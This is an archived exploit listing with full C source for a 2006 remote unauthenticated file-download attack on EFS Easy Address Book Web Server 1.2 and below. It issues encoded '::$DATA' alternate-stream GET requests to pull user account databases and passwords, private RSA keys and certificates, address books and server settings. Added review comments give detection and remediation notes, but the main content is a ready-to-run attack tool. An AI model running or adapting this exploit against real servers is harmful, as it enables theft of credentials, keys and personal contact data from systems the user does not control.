
efsStream.txt

efsStream.txt
Posted Nov 7, 2006
Authored by Greg Linares

EFS Easy Address Book web server versions 1.2 and below remote file stream exploit.

tags | exploit, remote, web
SHA-256 | d4914cf7bc4dd032087a23c8e5cc6f15f2b3d5407d2fb1331b5ae13379345bb4

efsStream.txt

/*
==========================================================================
0-day Alternative File Stream Exploit for EFS Easy Address Book Web Server
===========================================================================
EFS' Easy Address Book Web Server is vulnerable to file stream exploits which
can be exploited remotely to access files without authentication.

This could lead to server compromise and/or sensitive information disclosure.


0-day Easy Address Book Web Server Alternative File Stream Exploit
Discovered and Coded by Greg Linares ==> GLinares.code [at] gmail [dot] com
This tool demonstrates EFS' Easy Address Book Web Server Vulnerability to Alternative
Data Stream GET requests which allow unauthorized users to download server
critical files.

Discovered and Reported: 11-1-2006

Usage: exploit <hostname/IP> [port 80=default] [Method see below]

--------PoC Methods:-----
1 = Gather all login username and passwords and email addresses.
2 = Gather Private RSA Keys and Certificates for server.
3 = Gather All Addressbooks and Contact Info on the server.
4 = Gather Server Settings File and SMTP server info.



*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h> /* Win32 API */
#include <wininet.h> /* WinInet API */
/* PoC method selector (1-4 per the usage banner); assigned from argv[3] in main. */
int mthd;
/* TCP port passed to InternetConnect; assigned from argv[2] in main. */
unsigned short httpport;
/*
 * Request-path buffers, one per GET issued. They have static storage, so they
 * start zero-filled; main relies on that when it strcat()s into exploit2..6.
 * ExploitHTTP appends a 21-byte suffix to whichever buffer it is handed.
 */
char exploit[512], exploit2[512], exploit3[512], exploit4[512], exploit5[512], exploit6[512];
/* Scratch text written once to the output file before the first request. */
char logmsg[512];
/* Closing message naming the output file; set per method in main's switch. */
char endmsg[512];
HINTERNET inet; /* WinInet Internet Handle */
/* Append-mode output file opened in main's switch; stays NULL if no case matched. */
FILE *file;

/*
 * Issue one HTTP/1.0 GET for the path in `exp` with a percent-encoded
 * stream suffix appended, then copy the response body to the global `file`
 * and to stdout.
 *
 * inet - WinInet session handle (the parameter shadows the global of the
 *        same name).
 * host - server name or address, passed straight to InternetConnect.
 * exp  - request path; declared const but written to by strcat below.
 *
 * Uses the globals `httpport` and `file`. Any WinInet failure closes the
 * handles opened so far, closes `file` and terminates the process with
 * exit(1); there is no error return to the caller.
 *
 * Defender's view: the suffix "%3A%3A%24%44%41%54%41" decodes to "::$DATA",
 * the name of the default NTFS data stream. The page's claim is that the
 * server returns the file for such a path without authentication. Each
 * call therefore shows up as a GET whose decoded path ends in "::$DATA",
 * sent as HTTP/1.0 with the User-Agent given to InternetOpen in main
 * ("ESF Exp"). Because the whole path is percent-encoded byte by byte,
 * log or IDS matching has to run on the decoded URL. The general
 * server-side remedy is to canonicalise the decoded path and reject any
 * ':' stream specifier before access checks and file open.
 */
void ExploitHTTP (HINTERNET inet, const char *host, const char *exp)
{

HINTERNET connection; /* Connection Handle */
HINTERNET request; /* Request Handle */
unsigned long flags; /* HttpOpenRequest Flags */

char buffer[BUFSIZ];
unsigned long len;


printf("HOST: %s\n", host);
printf("PORT: %i\n", httpport);

/* NULL user name and password: no credentials are supplied. */
if ((connection = InternetConnect(inet, host, httpport,
NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0))
== NULL)
{
printf("Failed to Connect...Exiting\n");
InternetCloseHandle(inet);
/* NOTE(review): `file` is NULL if fopen failed or no switch case matched in main. */
fclose(file);
exit(1);
}

/* No auth prompts, redirects, cache writes or cookies; always fetch from the server. */
flags = INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_AUTO_REDIRECT |
INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_COOKIES |
INTERNET_FLAG_RELOAD;

/*
 * NOTE(review): writes through a const-qualified pointer and has no bounds
 * check. It only works because the visible callers pass the 512-byte global
 * buffers; a string literal or a nearly full buffer here is undefined
 * behaviour. <string.h> is not included for strcat.
 */
strcat(exp, "%3A%3A%24%44%41%54%41");

request = HttpOpenRequest(connection, "GET", exp, "HTTP/1.0", NULL, NULL, flags, 0);
if (request == NULL)
{
printf("HTTP Open Request failed....Exiting\n");
InternetCloseHandle(connection);
InternetCloseHandle(inet);
fclose(file);
exit(1);
}
if (!HttpSendRequest(request, NULL, 0, NULL, 0))
{
printf("HTTP Send Request failed....Exiting\n");
InternetCloseHandle(request);
InternetCloseHandle(connection);
InternetCloseHandle(inet);
fclose(file);
exit(1);
}
printf("Exploit Sent...Dumping HTTP Return Packet...");
/* NOTE(review): lowercase sleep is not the Win32 Sleep used in main; what it resolves to depends on the toolchain. */
sleep(1000);

/* Drain the response in BUFSIZ chunks until a read fails or returns 0 bytes. */
while (InternetReadFile(request, buffer, sizeof buffer, &len) && len > 0)
{
/* The result of the write to `file` is ignored; only the stdout copy is checked. */
fwrite(buffer, len, 1, file);
if (fwrite(buffer, len, 1, stdout) < 1)
{
printf("Error Outputting HTTP Return Packet\n");
}
}
/* The HTTP status code is never queried, so an error page is saved like any other body. */
InternetCloseHandle(request);
InternetCloseHandle(connection);
}


/*
 * Entry point: print the banner, open a WinInet session, pick the request
 * paths and output file for the chosen method, then call ExploitHTTP once
 * per path.
 *
 * argv[1] - host, argv[2] - port, argv[3] - method (1-4).
 *
 * NOTE(review): the banner advertises defaults for port and method, but the
 * code reads argv[2] and argv[3] unconditionally. With fewer than three
 * arguments this passes NULL to atoi or reads past the end of argv.
 *
 * Returns 0 on completion; failures exit(1) here or inside ExploitHTTP.
 */
int main (int argc, char *argv[])
{

/* The banner is printed on every run, before any argument validation. */
printf("\n=========================================================================\n");
printf("0-day Easy Address Book Web Server Alternative File Stream Exploit\n");
printf("Discovered and Coded by Greg Linares ==> GLinares.code [at] gmail [dot] com\n");
printf("This tool demonstrates EFS Address Book Server's Vulnerability to Alternative\n");
printf("Data Stream GET requests which allow unauthorized users to download server \n");
printf("critical files.\n");
printf("Discovered and Reported: 11-1-2006\n");
printf("\nUsage: %s <hostname/IP> [port 80=default] [Method see below]\n", argv[0]);
printf("--------PoC Methods:-----\n");
printf("1 = Gather all login username and passwords and email addresses.[Default]\n");
printf("2 = Gather Private RSA Keys and Certificates for server.\n");
printf("3 = Gather All Address Books and Contact Information on the server\n");
printf("4 = Gather Server Settings File and SMTP server info.\n");
printf("============================================================================\n");


/* "ESF Exp" is the agent string WinInet sends as User-Agent: a fixed, matchable value in server logs. */
inet = InternetOpen("ESF Exp", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (inet == NULL)
{
printf("Error accessing InternetOpen API - Exiting...\n");
exit(1);
}
/* Only guarantees that argv[1] exists; `inet` is not closed on this exit path. */
if (argc < 2)
{
printf("Invalid # of arguments...Exiting\n");
exit(1);
}
/*
 * NOTE(review): both range checks below set mthd = 1, but the unconditional
 * assignment that follows overwrites it, so out-of-range values are not clamped.
 */
if (atoi(argv[3]) > 4)
{
mthd = 1;
}
if (atoi(argv[3]) <= 0)
{
mthd = 1;
}
mthd = atoi(argv[3]);

/* Set Up Exploits */
/*
 * Each case opens an append-mode output file and stores a percent-encoded
 * request path in `exploit`. fopen results are not checked, and there is no
 * default case: an out-of-range mthd leaves `file` NULL and `exploit` empty.
 */
switch(mthd)
{
case 1:
file = fopen("Accounts.txt","a+");
sprintf(exploit, "%s", "%2F%61%64%64%72%62%6F%6F%6B%2F%75%73%65%72%2E%73%64%62");
sprintf(endmsg, "%s", "\n\n\nResults Dumped to Accounts.txt\n");
break;
case 2:
file = fopen("RSAKeys.txt", "a+");
sprintf(exploit, "%s", "%53%65%72%76%65%72%4B%65%79%2E%70%65%6D");
sprintf(endmsg, "%s", "\n\n\nResults Dumped to RSAKeys.txt\n");
break;
case 3:
file = fopen("AddrBooks.txt", "a+");
sprintf(exploit, "%s", "%2F%61%64%64%72%62%6F%6F%6B%2F%61%64%64%72%62%6F%6F%6B%31%2E%73%64%62");
/* NOTE(review): message says Messages.txt, but the file opened above is AddrBooks.txt. */
sprintf(endmsg, "%s", "\n\n\nResults Dumped to Messages.txt\n");
break;
case 4:
file = fopen("Server.txt", "a+");
sprintf(exploit, "%s", "%6F%70%74%69%6F%6E%2E%69%6E%69");
sprintf(endmsg, "%s", "\n\n\nResults Dumped to Server.txt\n");
break;
}



/*
 * NOTE(review): the second sprintf overwrites the first, so only the three
 * CRLF pairs reach the file and the host name is never logged. The first
 * sprintf also copies argv[1] into a 512-byte buffer with no length limit.
 */
sprintf(logmsg, "%s", argv[1]);
sprintf(logmsg, "%s", "\r\n\r\n\r\n");
fwrite(logmsg, strlen(logmsg), 1, file);
/* atoi result is narrowed to unsigned short with no range or error check. */
httpport = atoi(argv[2]);
ExploitHTTP(inet, argv[1], exploit);
/*
 * Methods 3 and 2 issue further requests. Each strcat targets a separate
 * global buffer and relies on it still being zero-filled from static
 * initialisation.
 */
if (mthd == 3)
{
printf("\n\n Sending 2nd Exploit...\n");
strcat(exploit2, "%2F%61%64%64%72%62%6F%6F%6B%2F%61%64%64%72%62%6F%6F%6B%32%2E%73%64%62");
ExploitHTTP(inet, argv[1], exploit2);
printf("\n\n Sending 3rd Exploit...\n");
strcat(exploit3, "%2F%61%64%64%72%62%6F%6F%6B%2F%61%64%64%72%62%6F%6F%6B%33%2E%73%64%62");
ExploitHTTP(inet, argv[1], exploit3);
printf("\n\n Sending 4th Exploit...\n");
strcat(exploit4, "%2F%61%64%64%72%62%6F%6F%6B%2F%61%64%64%72%62%6F%6F%6B%5F%75%73%65%72%2E%73%64%62");
ExploitHTTP(inet, argv[1], exploit4);
printf("\n\n Sending final Exploit...\n");
strcat(exploit5, "%2F%61%64%64%72%62%6F%6F%6B%2F%61%64%64%72%62%6F%6F%6B%67%72%6F%75%70%2E%73%64%62");
ExploitHTTP(inet, argv[1], exploit5);
}
/*
 * Per the banner, method 2 targets the server's private keys and
 * certificates. On a host that served these requests, that key material
 * should be treated as disclosed and replaced.
 */
if (mthd == 2)
{
printf("\n\n Sending 2nd Exploit...\n");
strcat(exploit2, "%53%65%72%76%65%72%43%65%72%74%2E%70%65%6D");
ExploitHTTP(inet, argv[1], exploit2);
printf("\n\n Sending 3rd Exploit...\n");
strcat(exploit3, "%52%6F%6F%74%43%65%72%74%2E%70%65%6D");
ExploitHTTP(inet, argv[1], exploit3);
printf("\n\n Sending 4th Exploit...\n");
strcat(exploit4, "%65%66%73%77%73%5F%6B%65%79%2E%70%65%6D");
ExploitHTTP(inet, argv[1], exploit4);
printf("\n\n Sending 5th Exploit...\n");
strcat(exploit5, "%65%66%73%77%73%5F%72%65%71%2E%70%65%6D");
ExploitHTTP(inet, argv[1], exploit5);
printf("\n\n Sending final Exploit...\n");
strcat(exploit6, "%65%66%73%77%73%5F%72%61%6E%64%2E%74%78%74");
ExploitHTTP(inet, argv[1], exploit6);
}

/* Normal-path cleanup: close the output file, pause briefly, release the session handle. */
fclose(file);
Sleep(500);
InternetCloseHandle(inet);
printf("\n\n===================================================\n");
printf("%s\n", endmsg);
printf("Proof Of Concept Exploit by Greg Linares\n");
printf("Send Comments/Concerns/Questions/Etc to GLinares.code [at] gmail [dot] com\n");
return 0;

}
